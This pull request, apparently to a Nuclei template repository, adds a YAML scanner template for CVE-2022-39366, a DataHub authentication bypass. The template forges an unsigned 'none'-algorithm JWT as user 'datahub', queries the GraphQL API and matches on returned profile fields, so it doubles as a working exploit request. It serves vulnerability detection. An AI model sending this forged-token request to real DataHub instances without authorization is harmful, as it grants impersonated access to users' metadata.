### PR TITLE
add CVE-2022-39366

### DIFF
--- a/cves/2022/CVE-2022-39366.yaml
+++ b/cves/2022/CVE-2022-39366.yaml
@@ -1,0 +1,58 @@
+id: CVE-2022-39366
+
+info:
+  name: DataHub Metadata Service (GMS) version 0.8.45 - Bypass Authentication
+  author: dwisiswant0
+  severity: critical
+  description: |
+    DataHub is an open-source metadata platform. Prior to version 0.8.45, the `StatelessTokenService`
+    of the DataHub metadata service (GMS) does not verify the signature of JWT tokens. This allows an
+    attacker to connect to DataHub instances as any user if Metadata Service authentication is enabled.
+    This vulnerability occurs because the `StatelessTokenService` of the Metadata service uses the `parse`
+    method of `io.jsonwebtoken.JwtParser`, which does not perform a verification of the cryptographic
+    token signature. This means that JWTs are accepted regardless of the used algorithm. This issue may
+    lead to an authentication bypass.
+  reference:
+    - https://twitter.com/artsploit/status/1632034715061420032
+    - https://github.blog/2023-03-03-github-security-lab-audited-datahub-heres-what-they-found/#missing-jwt-signature-check-ghsl-2022-078
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-39366
+  tags: cve,cve2022,datahub,auth-bypass
+
+variables:
+  json: |
+    {
+      "version": 1,
+      "type": "PERSONAL",
+      "actorType": "USER",
+      "actorId": "datahub"
+    }
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/api/graphql"
+    headers:
+      Authorization: "Bearer {{generate_jwt(json, 'none')}}"
+      Content-Type: "application/json"
+    body: |
+      {
+        "query": "{
+          me {
+            corpUser {
+              properties
+            }
+          }
+        }",
+        "variables": {}
+      }
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "(customProperties|d(epartment|isplay)Name|(full|last)Name)"
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- add CVE-2022-39366
- References:
    - https://twitter.com/artsploit/status/1632034715061420032
    - https://github.blog/2023-03-03-github-security-lab-audited-datahub-heres-what-they-found/#missing-jwt-signature-check-ghsl-2022-078
    - https://nvd.nist.gov/vuln/detail/CVE-2022-39366

### Template Validation

I've validated this template locally?
- [ ] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)